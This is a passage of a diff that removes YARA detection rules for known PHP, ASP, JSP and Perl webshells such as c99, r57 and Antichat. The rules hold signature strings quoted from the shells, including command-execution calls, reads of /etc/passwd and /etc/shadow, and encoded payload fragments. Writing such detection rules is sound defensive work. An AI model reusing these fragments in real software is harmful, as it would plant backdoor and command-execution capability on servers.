-		$s1 = "s72 Shell v1.0 Codinf by Cr@zy_King"
-		$s3 = "echo \"<p align=center>Dosya Zaten Bulunuyor</p>\"" 
-	condition:
-		1 of them
-}
-rule hidshell_php_php {
-	meta:
-		description = "Semi-Auto-generated  - file hidshell.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "c2f3327d60884561970c63ffa09439a4"
-	strings:
-		$s0 = "<?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U"
-	condition:
-		all of them
-}
-rule kacak_asp {
-	meta:
-		description = "Semi-Auto-generated  - file kacak.asp.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "907d95d46785db21331a0324972dda8c"
-	strings:
-		$s0 = "Kacak FSO 1.0"
-		$s1 = "if request.querystring(\"TGH\") = \"1\" then"
-		$s3 = "<font color=\"#858585\">BuqX</font></a></font><font face=\"Verdana\" style="
-		$s4 = "mailto:BuqX@hotmail.com"
-	condition:
-		1 of them
-}
-rule PHP_Backdoor_Connect_pl_php {
-	meta:
-		description = "Semi-Auto-generated  - file PHP Backdoor Connect.pl.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "57fcd9560dac244aeaf95fd606621900"
-	strings:
-		$s0 = "LorD of IRAN HACKERS SABOTAGE"
-		$s1 = "LorD-C0d3r-NT" 
-		$s2 = "echo --==Userinfo==-- ;"
-	condition:
-		1 of them
-}
-rule Antichat_Socks5_Server_php_php {
-	meta:
-		description = "Semi-Auto-generated  - file Antichat Socks5 Server.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "cbe9eafbc4d86842a61a54d98e5b61f1"
-	strings:
-		$s0 = "$port = base_convert(bin2hex(substr($reqmessage[$id], 3+$reqlen+1, 2)), 16, 10);" fullword
-		$s3 = "#   [+] Domain name address type"
-		$s4 = "www.antichat.ru"
-	condition:
-		1 of them
-}
-rule Antichat_Shell_v1_3_php {
-	meta:
-		description = "Semi-Auto-generated  - file Antichat Shell v1.3.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "40d0abceba125868be7f3f990f031521"
-	strings:
-		$s0 = "Antichat"
-		$s1 = "Can't open file, permission denide"
-		$s2 = "$ra44"
-	condition:
-		2 of them
-}
-rule Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2_php {
-	meta:
-		description = "Semi-Auto-generated  - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "49ad9117c96419c35987aaa7e2230f63"
-	strings:
-		$s0 = "Welcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy"
-		$s1 = "Mode Shell v1.0</font></span>"
-		$s2 = "has been already loaded. PHP Emperor <xb5@hotmail."
-	condition:
-		1 of them
-}
-rule mysql_php_php {
-	meta:
-		description = "Semi-Auto-generated  - file mysql.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "12bbdf6ef403720442a47a3cc730d034"
-	strings:
-		$s0 = "action=mysqlread&mass=loadmass\">load all defaults"
-		$s2 = "if (@passthru($cmd)) { echo \" -->\"; $this->output_state(1, \"passthru"
-		$s3 = "$ra44  = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = "
-	condition:
-		1 of them
-}
-rule Worse_Linux_Shell_php {
-	meta:
-		description = "Semi-Auto-generated  - file Worse Linux Shell.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "8338c8d9eab10bd38a7116eb534b5fa2"
-	strings:
-		$s1 = "print \"<tr><td><b>Server is:</b></td><td>\".$_SERVER['SERVER_SIGNATURE'].\"</td"
-		$s2 = "print \"<tr><td><b>Execute command:</b></td><td><input size=100 name=\\\"_cmd"
-	condition:
-		1 of them
-}
-rule cyberlords_sql_php_php {
-	meta:
-		description = "Semi-Auto-generated  - file cyberlords_sql.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "03b06b4183cb9947ccda2c3d636406d4"
-	strings:
-		$s0 = "Coded by n0 [nZer0]"
-		$s1 = " www.cyberlords.net"
-		$s2 = "U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAMUExURf///wAAAJmZzAAAACJoURkAAAAE"
-		$s3 = "return \"<BR>Dump error! Can't write to \".htmlspecialchars($file);"
-	condition:
-		1 of them
-}
-rule cmd_asp_5_1_asp {
-	meta:
-		description = "Semi-Auto-generated  - file cmd-asp-5.1.asp.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "8baa99666bf3734cbdfdd10088e0cd9f"
-	strings:
-		$s0 = "Call oS.Run(\"win.com cmd.exe /c del \"& szTF,0,True)" fullword
-		$s3 = "Call oS.Run(\"win.com cmd.exe /c \"\"\" & szCMD & \" > \" & szTF &" fullword
-	condition:
-		1 of them
-}
-rule pws_php_php {
-	meta:
-		description = "Semi-Auto-generated  - file pws.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "ecdc6c20f62f99fa265ec9257b7bf2ce"
-	strings:
-		$s0 = "<div align=\"left\"><font size=\"1\">Input command :</font></div>" fullword
-		$s1 = "<input type=\"text\" name=\"cmd\" size=\"30\" class=\"input\"><br>" fullword
-		$s4 = "<input type=\"text\" name=\"dir\" size=\"30\" value=\"<? passthru(\"pwd\"); ?>"
-	condition:
-		2 of them
-}
-rule PHP_Shell_php_php {
-	meta:
-		description = "Semi-Auto-generated  - file PHP Shell.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "a2f8fa4cce578fc9c06f8e674b9e63fd"
-	strings:
-		$s0 = "echo \"</form><form action=\\\"$SFileName?$urlAdd\\\" method=\\\"post\\\"><input"
-		$s1 = "echo \"<form action=\\\"$SFileName?$urlAdd\\\" method=\\\"POST\\\"><input type="
-	condition:
-		all of them
-}
-rule Ayyildiz_Tim___AYT__Shell_v_2_1_Biz_html {
-	meta:
-		description = "Semi-Auto-generated  - file Ayyildiz Tim  -AYT- Shell v 2.1 Biz.html.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "8a8c8bb153bd1ee097559041f2e5cf0a"
-	strings:
-		$s0 = "Ayyildiz"
-		$s1 = "TouCh By iJOo"
-		$s2 = "First we check if there has been asked for a working directory"
-		$s3 = "http://ayyildiz.org/images/whosonline2.gif"
-	condition:
-		2 of them
-}
-rule EFSO_2_asp {
-	meta:
-		description = "Semi-Auto-generated  - file EFSO_2.asp.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "b5fde9682fd63415ae211d53c6bfaa4d"
-	strings:
-		$s0 = "Ejder was HERE"
-		$s1 = "*~PU*&BP[_)f!8c2F*@#@&~,P~P,~P&q~8BPmS~9~~lB~X`V,_,F&*~,jcW~~[_c3TRFFzq@#@&PP,~~"
-	condition:
-		2 of them
-}
-rule lamashell_php {
-	meta:
-		description = "Semi-Auto-generated  - file lamashell.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "de9abc2e38420cad729648e93dfc6687"
-	strings:
-		$s0 = "lama's'hell" fullword
-		$s1 = "if($_POST['king'] == \"\") {"
-		$s2 = "if (move_uploaded_file($_FILES['fila']['tmp_name'], $curdir.\"/\".$_FILES['f"
-	condition:
-		1 of them
-}
-rule Ajax_PHP_Command_Shell_php {
-	meta:
-		description = "Semi-Auto-generated  - file Ajax_PHP Command Shell.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "93d1a2e13a3368a2472043bd6331afe9"
-	strings:
-		$s1 = "newhtml = '<b>File browser is under construction! Use at your own risk!</b> <br>"
-		$s2 = "Empty Command..type \\\"shellhelp\\\" for some ehh...help"
-		$s3 = "newhtml = '<font size=0><b>This will reload the page... :(</b><br><br><form enct"
-	condition:
-		1 of them
-}
-rule JspWebshell_1_2_jsp {
-	meta:
-		description = "Semi-Auto-generated  - file JspWebshell 1.2.jsp.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "70a0ee2624e5bbe5525ccadc467519f6"
-	strings:
-		$s0 = "JspWebshell"
-		$s1 = "CreateAndDeleteFolder is error:"
-		$s2 = "<td width=\"70%\" height=\"22\">&nbsp;<%=env.queryHashtable(\"java.c"
-		$s3 = "String _password =\"111\";"
-	condition:
-		2 of them
-}
-rule Sincap_php_php {
-	meta:
-		description = "Semi-Auto-generated  - file Sincap.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "b68b90ff6012a103e57d141ed38a7ee9"
-	strings:
-		$s0 = "$baglan=fopen(\"/tmp/$ekinci\",'r');"
-		$s2 = "$tampon4=$tampon3-1"
-		$s3 = "@aventgrup.net"
-	condition:
-		2 of them
-}
-rule Test_php_php {
-	meta:
-		description = "Semi-Auto-generated  - file Test.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "77e331abd03b6915c6c6c7fe999fcb50"
-	strings:
-		$s0 = "$yazi = \"test\" . \"\\r\\n\";" fullword
-		$s2 = "fwrite ($fp, \"$yazi\");" fullword
-		$s3 = "$entry_line=\"HACKed by EntriKa\";" fullword
-	condition:
-		1 of them
-}
-rule Phyton_Shell_py {
-	meta:
-		description = "Semi-Auto-generated  - file Phyton Shell.py.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "92b3c897090867c65cc169ab037a0f55"
-	strings:
-		$s1 = "sh_out=os.popen(SHELL+\" \"+cmd).readlines()" fullword
-		$s2 = "#   d00r.py 0.3a (reverse|bind)-shell in python by fQ" fullword
-		$s3 = "print \"error; help: head -n 16 d00r.py\"" fullword
-		$s4 = "print \"PW:\",PW,\"PORT:\",PORT,\"HOST:\",HOST" fullword
-	condition:
-		1 of them
-}
-rule mysql_tool_php_php {
-	meta:
-		description = "Semi-Auto-generated  - file mysql_tool.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "5fbe4d8edeb2769eda5f4add9bab901e"
-	strings:
-		$s0 = "$error_text = '<strong>Failed selecting database \"'.$this->db['"
-		$s1 = "$ra44  = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_SERV"
-		$s4 = "<div align=\"center\">The backup process has now started<br "
-	condition:
-		1 of them
-}
-rule Zehir_4_asp {
-	meta:
-		description = "Semi-Auto-generated  - file Zehir 4.asp.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "7f4e12e159360743ec016273c3b9108c"
-	strings:
-		$s2 = "</a><a href='\"&dosyapath&\"?status=10&dPath=\"&f1.path&\"&path=\"&path&\"&Time="
-		$s4 = "<input type=submit value=\"Test Et!\" onclick=\""
-	condition:
-		1 of them
-}
-rule sh_php_php {
-	meta:
-		description = "Semi-Auto-generated  - file sh.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "330af9337ae51d0bac175ba7076d6299"
-	strings:
-		$s1 = "$ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/e"
-		$s2 = "Show <input type=text size=5 value=\".((isset($_POST['br_st']))?$_POST['br_st']:"
-	condition:
-		1 of them
-}
-rule phpbackdoor15_php {
-	meta:
-		description = "Semi-Auto-generated  - file phpbackdoor15.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "0fdb401a49fc2e481e3dfd697078334b"
-	strings:
-		$s1 = "echo \"fichier telecharge dans \".good_link(\"./\".$_FILES[\"fic\"][\"na"
-		$s2 = "if(move_uploaded_file($_FILES[\"fic\"][\"tmp_name\"],good_link(\"./\".$_FI"
-		$s3 = "echo \"Cliquez sur un nom de fichier pour lancer son telechargement. Cliquez s"
-	condition:
-		1 of them
-}
-rule phpjackal_php {
-	meta:
-		description = "Semi-Auto-generated  - file phpjackal.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "ab230817bcc99acb9bdc0ec6d264d76f"
-	strings:
-		$s3 = "$dl=$_REQUEST['downloaD'];"
-		$s4 = "else shelL(\"perl.exe $name $port\");"
-	condition:
-		1 of them
-}
-rule sql_php_php {
-	meta:
-		description = "Semi-Auto-generated  - file sql.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "8334249cbb969f2d33d678fec2b680c5"
-	strings:
-		$s1 = "fputs ($fp, \"# RST MySQL tools\\r\\n# Home page: http://rst.void.ru\\r\\n#"
-		$s2 = "http://rst.void.ru"
-		$s3 = "print \"<a href=\\\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&"
-	condition:
-		1 of them
-}
-rule cgi_python_py {
-	meta:
-		description = "Semi-Auto-generated  - file cgi-python.py.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "0a15f473e2232b89dae1075e1afdac97"
-	strings:
-		$s0 = "a CGI by Fuzzyman"
-		$s1 = "\"\"\"+fontline +\"Version : \" + versionstring + \"\"\", Running on : \"\"\" + "
-		$s2 = "values = map(lambda x: x.value, theform[field])     # allows for"
-	condition:
-		1 of them
-}
-rule ru24_post_sh_php_php {
-	meta:
-		description = "Semi-Auto-generated  - file ru24_post_sh.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "5b334d494564393f419af745dc1eeec7"
-	strings:
-		$s1 = "<title>Ru24PostWebShell - \".$_POST['cmd'].\"</title>" fullword
-		$s3 = "if ((!$_POST['cmd']) || ($_POST['cmd']==\"\")) { $_POST['cmd']=\"id;pwd;uname -a"
-		$s4 = "Writed by DreAmeRz" fullword
-	condition:
-		1 of them
-}
-rule DTool_Pro_php {
-	meta:
-		description = "Semi-Auto-generated  - file DTool Pro.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "366ad973a3f327dfbfb915b0faaea5a6"
-	strings:
-		$s0 = "r3v3ng4ns\\nDigite"
-		$s1 = "if(!@opendir($chdir)) $ch_msg=\"dtool: line 1: chdir: It seems that the permissi"
-		$s3 = "if (empty($cmd) and $ch_msg==\"\") echo (\"Comandos Exclusivos do DTool Pro\\n"
-	condition:
-		1 of them
-}
-rule telnetd_pl {
-	meta:
-		description = "Semi-Auto-generated  - file telnetd.pl.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "5f61136afd17eb025109304bd8d6d414"
-	strings:
-		$s0 = "0ldW0lf" fullword
-		$s1 = "However you are lucky :P"
-		$s2 = "I'm FuCKeD"
-		$s3 = "ioctl($CLIENT{$client}->{shell}, &TIOCSWINSZ, $winsize);#"
-		$s4 = "atrix@irc.brasnet.org"
-	condition:
-		1 of them
-}
-rule php_include_w_shell_php {
-	meta:
-		description = "Semi-Auto-generated  - file php-include-w-shell.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "4e913f159e33867be729631a7ca46850"
-	strings:
-		$s0 = "$dataout .= \"<td><a href='$MyLoc?$SREQ&incdbhost=$myhost&incdbuser=$myuser&incd"
-		$s1 = "if($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $strOutput .= DB"
-	condition:
-		1 of them
-}
-rule Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php {
-	meta:
-		description = "Semi-Auto-generated  - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "6163b30600f1e80d2bb5afaa753490b6"
-	strings:
-		$s0 = "Safe0ver" fullword
-		$s1 = "Script Gecisi Tamamlayamadi!"
-		$s2 = "document.write(unescape('%3C%68%74%6D%6C%3E%3C%62%6F%64%79%3E%3C%53%43%52%49%50%"
-	condition:
-		1 of them
-}
-rule shell_php_php {
-	meta:
-		description = "Semi-Auto-generated  - file shell.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "1a95f0163b6dea771da1694de13a3d8d"
-	strings:
-		$s1 = "/* We have found the parent dir. We must be carefull if the parent " fullword
-		$s2 = "$tmpfile = tempnam('/tmp', 'phpshell');" 
-		$s3 = "if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {" fullword
-	condition:
-		1 of them
-}
-rule telnet_cgi {
-	meta:
-		description = "Semi-Auto-generated  - file telnet.cgi.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "dee697481383052980c20c48de1598d1"
-	strings:
-		$s0 = "www.rohitab.com"
-		$s1 = "W A R N I N G: Private Server"
-		$s2 = "print \"Set-Cookie: SAVEDPWD=;\\n\"; # remove password cookie"
-		$s3 = "$Prompt = $WinNT ? \"$CurrentDir> \" : \"[admin\\@$ServerName $C"
-	condition:
-		1 of them
-}
-rule ironshell_php {
-	meta:
-		description = "Semi-Auto-generated  - file ironshell.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "8bfa2eeb8a3ff6afc619258e39fded56"
-	strings:
-		$s0 = "www.ironwarez.info"
-		$s1 = "$cookiename = \"wieeeee\";"
-		$s2 = "~ Shell I"
-		$s3 = "www.rootshell-team.info"
-		$s4 = "setcookie($cookiename, $_POST['pass'], time()+3600);"
-	condition:
-		1 of them
-}
-rule backdoorfr_php {
-	meta:
-		description = "Semi-Auto-generated  - file backdoorfr.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "91e4afc7444ed258640e85bcaf0fecfc"
-	strings:
-		$s1 = "www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tan"
-		$s2 = "print(\"<br>Provenance du mail : <input type=\\\"text\\\" name=\\\"provenanc"
-	condition:
-		1 of them
-}
-rule aspydrv_asp {
-	meta:
-		description = "Semi-Auto-generated  - file aspydrv.asp.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "1c01f8a88baee39aa1cebec644bbcb99"
-		score = 60
-	strings:
-		$s0 = "If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex))"
-		$s1 = "password"
-		$s2 = "session(\"shagman\")="
-	condition:
-		2 of them
-}
-rule cmdjsp_jsp {
-	meta:
-		description = "Semi-Auto-generated  - file cmdjsp.jsp.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "b815611cc39f17f05a73444d699341d4"
-	strings:
-		$s0 = "// note that linux = cmd and windows = \"cmd.exe /c + cmd\" " fullword
-		$s1 = "Process p = Runtime.getRuntime().exec(\"cmd.exe /C \" + cmd);" fullword
-		$s2 = "cmdjsp.jsp" 
-		$s3 = "michaeldaw.org" fullword
-	condition:
-		1 of them
-}
-rule h4ntu_shell__powered_by_tsoi_ {
-	meta:
-		description = "Semi-Auto-generated  - file h4ntu shell [powered by tsoi].txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "06ed0b2398f8096f1bebf092d0526137"
-	strings:
-		$s0 = "h4ntu shell"
-		$s1 = "system(\"$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp\");"
-	condition:
-		1 of them
-}
-rule Ajan_asp {
-	meta:
-		description = "Semi-Auto-generated  - file Ajan.asp.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "b6f468252407efc2318639da22b08af0"
-	strings:
-		$s1 = "c:\\downloaded.zip"
-		$s2 = "Set entrika = entrika.CreateTextFile(\"c:\\net.vbs\", True)" fullword
-		$s3 = "http://www35.websamba.com/cybervurgun/"
-	condition:
-		1 of them
-}
-rule PHANTASMA_php {
-	meta:
-		description = "Semi-Auto-generated  - file PHANTASMA.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "52779a27fa377ae404761a7ce76a5da7"
-	strings:
-		$s0 = ">[*] Safemode Mode Run</DIV>"
-		$s1 = "$file1 - $file2 - <a href=$SCRIPT_NAME?$QUERY_STRING&see=$file>$file</a><br>"
-		$s2 = "[*] Spawning Shell"
-		$s3 = "Cha0s"
-	condition:
-		2 of them
-}
-rule MySQL_Web_Interface_Version_0_8_php {
-	meta:
-		description = "Semi-Auto-generated  - file MySQL Web Interface Version 0.8.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "36d4f34d0a22080f47bb1cb94107c60f"
-	strings:
-		$s0 = "SooMin Kim"
-		$s1 = "http://popeye.snu.ac.kr/~smkim/mysql"
-		$s2 = "href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename"
-		$s3 = "<th>Type</th><th>&nbspM&nbsp</th><th>&nbspD&nbsp</th><th>unsigned</th><th>zerofi"
-	condition:
-		2 of them
-}
-rule simple_cmd_html {
-	meta:
-		description = "Semi-Auto-generated  - file simple_cmd.html.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "c6381412df74dbf3bcd5a2b31522b544"
-	strings:
-		$s1 = "<title>G-Security Webshell</title>" fullword
-		$s2 = "<input type=TEXT name=\"-cmd\" size=64 value=\"<?=$cmd?>\" " fullword
-		$s3 = "<? if($cmd != \"\") print Shell_Exec($cmd);?>" fullword
-		$s4 = "<? $cmd = $_REQUEST[\"-cmd\"];?>" fullword
-	condition:
-		all of them
-}
-rule _1_c2007_php_php_c100_php {
-	meta:
-		description = "Semi-Auto-generated  - from files 1.txt, c2007.php.php.txt, c100.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		super_rule = 1
-		hash0 = "44542e5c3e9790815c49d5f9beffbbf2"
-		hash1 = "d089e7168373a0634e1ac18c0ee00085"
-		hash2 = "38fd7e45f9c11a37463c3ded1c76af4c"
-	strings:
-		$s0 = "echo \"<b>Changing file-mode (\".$d.$f.\"), \".view_perms_color($d.$f).\" (\""
-		$s3 = "echo \"<td>&nbsp;<a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur"
-	condition:
-		1 of them
-}
-rule _nst_php_php_img_php_php_nstview_php_php {
-	meta:
-		description = "Semi-Auto-generated  - from files nst.php.php.txt, img.php.php.txt, nstview.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		super_rule = 1
-		hash0 = "ddaf9f1986d17284de83a17fe5f9fd94"
-		hash1 = "17a07bb84e137b8aa60f87cd6bfab748"
-		hash2 = "4745d510fed4378e4b1730f56f25e569"
-	strings:
-		$s0 = "<tr><form method=post><td><font color=red><b>Back connect:</b></font></td><td><i"
-		$s1 = "$perl_proxy_scp = \"IyEvdXNyL2Jpbi9wZXJsICANCiMhL3Vzci91c2MvcGVybC81LjAwNC9iaW4v"
-		$s2 = "<tr><form method=post><td><font color=red><b>Backdoor:</b></font></td><td><input"
-	condition:
-		1 of them
-}
-rule _network_php_php_xinfo_php_php_nfm_php_php {
-	meta:
-		description = "Semi-Auto-generated  - from files network.php.php.txt, xinfo.php.php.txt, nfm.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		super_rule = 1
-		hash0 = "acdbba993a5a4186fd864c5e4ea0ba4f"
-		hash1 = "2601b6fc1579f263d2f3960ce775df70"
-		hash2 = "401fbae5f10283051c39e640b77e4c26"
-	strings:
-		$s0 = ".textbox { background: White; border: 1px #000000 solid; color: #000099; font-fa"
-		$s2 = "<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''"
-	condition:
-		all of them
-}
-rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_SpecialShell_99_php_php {
-	meta:
-		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, SpecialShell_99.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		super_rule = 1
-		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
-		hash1 = "3ca5886cd54d495dc95793579611f59a"
-		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
-		hash3 = "09609851caa129e40b0d56e90dfc476c"
-	strings:
-		$s2 = "echo \"<hr size=\\\"1\\\" noshade><b>Done!</b><br>Total time (secs.): \".$ft"
-		$s3 = "$fqb_log .= \"\\r\\n------------------------------------------\\r\\nDone!\\r"
-	condition:
-		1 of them
-}
-rule _r577_php_php_SnIpEr_SA_Shell_php_r57_php_php_r57_Shell_php_php_spy_php_php_s_php_php {
-	meta:
-		description = "Semi-Auto-generated  - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		super_rule = 1
-		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
-		hash1 = "911195a9b7c010f61b66439d9048f400"
-		hash2 = "eddf7a8fde1e50a7f2a817ef7cece24f"
-		hash3 = "8023394542cddf8aee5dec6072ed02b5"
-		hash4 = "eed14de3907c9aa2550d95550d1a2d5f"
-		hash5 = "817671e1bdc85e04cc3440bbd9288800"
-	strings:
-		$s2 = "'eng_text71'=>\"Second commands param is:\\r\\n- for CHOWN - name of new owner o"
-		$s4 = "if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult"
-	condition:
-		1 of them
-}
-rule _c99shell_v1_0_php_php_c99php_SsEs_php_php_ctt_sh_php_php {
-	meta:
-		description = "Semi-Auto-generated  - from files c99shell_v1.0.php.php.txt, c99php.txt, SsEs.php.php.txt, ctt_sh.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		super_rule = 1
-		hash0 = "d8ae5819a0a2349ec552cbcf3a62c975"
-		hash1 = "9e9ae0332ada9c3797d6cee92c2ede62"
-		hash2 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
-		hash3 = "671cad517edd254352fe7e0c7c981c39"
-	strings:
-		$s0 = "\"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze\""
-		$s2 = "\"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm\""
-		$s4 = "\"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo\""
-	condition:
-		2 of them
-}
-rule _r577_php_php_spy_php_php_s_php_php {
-	meta:
-		description = "Semi-Auto-generated  - from files r577.php.php.txt, spy.php.php.txt, s.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		super_rule = 1
-		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
-		hash1 = "eed14de3907c9aa2550d95550d1a2d5f"
-		hash2 = "817671e1bdc85e04cc3440bbd9288800"
-	strings:
-		$s2 = "echo $te.\"<div align=center><textarea cols=35 name=db_query>\".(!empty($_POST['"
-		$s3 = "echo sr(45,\"<b>\".$lang[$language.'_text80'].$arrow.\"</b>\",\"<select name=db>"
-	condition:
-		1 of them
-}
-rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_c99shell_v1_0_php_php_c99php_SpecialShell_99_php_php_ctt_sh_php_php {
-	meta:
-		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SpecialShell_99.php.php.txt, ctt_sh.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		super_rule = 1
-		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
-		hash1 = "3ca5886cd54d495dc95793579611f59a"
-		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
-		hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
-		hash4 = "9e9ae0332ada9c3797d6cee92c2ede62"
-		hash5 = "09609851caa129e40b0d56e90dfc476c"
-		hash6 = "671cad517edd254352fe7e0c7c981c39"
-	strings:
-		$s0 = "  if ($copy_unset) {foreach($sess_data[\"copy\"] as $k=>$v) {unset($sess_data[\""
-		$s1 = "  if (file_exists($mkfile)) {echo \"<b>Make File \\\"\".htmlspecialchars($mkfile"
-		$s2 = "  echo \"<center><b>MySQL \".mysql_get_server_info().\" (proto v.\".mysql_get_pr"
-		$s3 = "  elseif (!fopen($mkfile,\"w\")) {echo \"<b>Make File \\\"\".htmlspecialchars($m"
-	condition:
-		all of them
-}
-rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_c99shell_v1_0_php_php_c99php_SpecialShell_99_php_php {
-	meta:
-		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SpecialShell_99.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		super_rule = 1
-		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
